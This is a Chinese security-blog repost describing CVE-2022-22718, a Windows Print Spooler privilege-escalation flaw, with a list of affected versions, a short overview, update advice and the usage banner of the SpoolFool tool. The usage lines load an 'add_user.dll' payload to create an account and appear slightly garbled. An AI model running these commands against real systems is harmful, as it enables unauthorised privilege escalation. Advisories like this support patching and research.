CVE-2022-22718:Windows Print Spooler提权

admin
admin
admin
138635
文章
114
评论
2023年4月11日03:10:57评论128 views字数 2453阅读8分10秒阅读模式

影响范围

  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

  • Windows Server 2008 for x64-based Systems Service Pack 2

  • Windows 7 for 32-bit Systems Service Pack 1

  • Windows Server 2016 (Server Core installation)

  • Windows Server 2016

  • Windows 10 Version 1607 for x64-based Systems

  • Windows 10 Version 1607 for 32-bit Systems

  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

  • Windows Server 2008 for 32-bit Systems Service Pack 2

  • Windows RT 8.1

  • Windows 8.1 for x64-based systems

  • Windows 8.1 for 32-bit systems

  • Windows 7 for x64-based Systems Service Pack 1

  • Windows 10 for x64-based Systems

  • Windows 10 for 32-bit Systems

  • Windows 10 Version 21H2 for x64-based Systems

  • Windows 10 Version 21H1 for x64-based Systems

  • Windows 10 Version 1909 for ARM64-based Systems

  • Windows 10 Version 1909 for x64-based Systems

  • Windows 10 Version 1909 for 32-bit Systems

  • Windows Server 2012 R2 (Server Core installation)

  • Windows Server 2012 R2

  • Windows Server 2012 (Server Core installation)

  • Windows Server 2012

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1

  • Windows 10 Version 21H2 for ARM64-based Systems

  • Windows 10 Version 21H2 for 32-bit Systems

  • Windows 11 for ARM64-based Systems

  • Windows 11 for x64-based Systems

  • Windows Server, version 20H2 (Server Core Installation)

  • Windows 10 Version 20H2 for ARM64-based Systems

  • Windows 10 Version 20H2 for 32-bit Systems

  • Windows 10 Version 20H2 for x64-based Systems

  • Windows Server 2022 Azure Edition Core Hotpatch

  • Windows Server 2022 (Server Core installation)

  • Windows Server 2022

  • Windows 10 Version 21H1 for 32-bit Systems

  • Windows 10 Version 21H1 for ARM64-based Systems

  • Windows Server 2019 (Server Core installation)

  • Windows Server 2019

  • Windows 10 Version 1809 for ARM64-based Systems

  • Windows 10 Version 1809 for x64-based Systems

  • Windows 10 Version 1809 for 32-bit Systems

漏洞类型

本地权限提升

利用条件

影响范围应用

漏洞概述

2022年02月09日,微软发布了安全更新,修复了48个安全漏洞(不包括22个Microsoft Edge漏洞),其中CVE-2022-22718为Windows后台打印程序特权提升漏洞,CVSS评分7.7

漏洞复现

使用说明:

PS C:SpoolFool> .SpoolFool.exe
SpoolFool  By Oliver Lyak (@ly4k_)
Examples:  C:SpoolFoolSpoolFool.exe -dll add_user.dll  C:SpoolFoolSpoolFool.exe -dll add_user.dll -printer 'My Printer'  C:SpoolFoolSpoolFool.exe -dll add_user.dll -dir 'SECRET'  C:SpoolFoolSpoolFool.exe -dll add_user.dll -printer 'My Printer' -dir 'SECRET'

powershell:

PS C:SpoolFool> ipmo .SpoolFool.ps1PS C:SpoolFool> Invoke-SpoolFool
SpoolFool  By Oliver Lyak (@ly4k_)
Examples:   -dll add_user.dll   -dll add_user.dll -printer 'My Printer'   -dll add_user.dll -dir 'SECRET'   -dll add_user.dll -printer 'My Printer' -dir 'SECRET'

CVE-2022-22718:Windows Print Spooler提权

安全建议

升级到最新版本~

后台回复"Print Spooler",获取POC
后台回复"Print Spooler",获取POC
后台回复"Print Spooler",获取POC

原文始发于微信公众号(七芒星实验室):CVE-2022-22718:Windows Print Spooler提权

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年4月11日03:10:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2022-22718:Windows Print Spooler提权https://cn-sec.com/archives/1665627.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息